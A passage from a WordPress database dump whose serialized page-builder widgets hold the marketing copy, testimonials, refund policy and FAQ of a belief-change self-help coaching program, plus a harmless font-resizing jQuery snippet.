src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1606, 2043, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:61616:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<div class="parg-text"><p><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It’s that simple.</span></strong></p>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear 